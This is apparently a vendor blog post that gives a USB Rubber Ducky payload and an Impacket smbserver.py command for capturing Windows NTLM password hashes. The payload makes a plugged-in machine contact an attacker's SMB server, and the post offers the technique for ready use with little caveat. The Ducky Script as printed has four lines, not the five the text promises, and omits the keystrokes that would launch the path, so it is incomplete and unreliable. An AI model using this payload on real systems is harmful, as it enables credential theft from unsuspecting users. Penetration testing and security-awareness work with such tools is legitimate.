What's the quickest way to steal a Windows password hash?

Using a USB Rubber Ducky and this simple payload, Windows password hashes can be captured for cracking in less than two seconds.

This technique works against almost all versions of Microsoft Windows and only requires a 5 line Ducky Script and an open source server setup on the target network.

Killer Effort:Reward Ratio

This is actually one of my favorite USB Rubber Ducky payloads for policy compliance and information security awareness. It leverages built in functionality of the Microsoft Windows operating system, requires next to nothing in terms of privileges, and executes faster than a user could reasonably thwart the attack by unplugging the seemingly benign "USB Thumbdrive". 

The intel gained from this extremely quick attack is also of great value to any penetration tester or internal red team. Timestamp, workstation ID, user and even NTLM hash. What's not to love?

What you'll need

The Ducky Script

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Hak5Darren
DELAY 1000
STRING \\hostname

That's literally it. Just replace hostname with the hostname or IP address of your listening server running Impacket's smbserver.py

The Server

This USB Rubber Ducky payload attempts to access an SMB share on the network - \\hostname. When Windows attempts to open this share, part of the process is passing its NTLM network hash, along with its hostname (workstation ID) and username. Of course you'll also get the timestamp. What more could one ask for?

Rather than using an actual SMB server - we'll want to use Impacket's smbserver.py since it'll allow us to easily capture all of this information. The basic usage is to supply a share name and point it at a directly. This can be anything really - from tmp /tmp/ to "YOU'VE BROKEN COMPANY USB POLICY. IT WILL CONTACT YOU SOON" /stuff/

impacket/examples/smbserver.py tmp /tmp/

Have fun with that one.

Now of course this payload will work best when you have the listening smb server on the target LAN, as most good firewalls will prevent SMB access over the Internet. At least - they should... ;-)

Sign up for sales, new releases, payloads and more…

Sign up today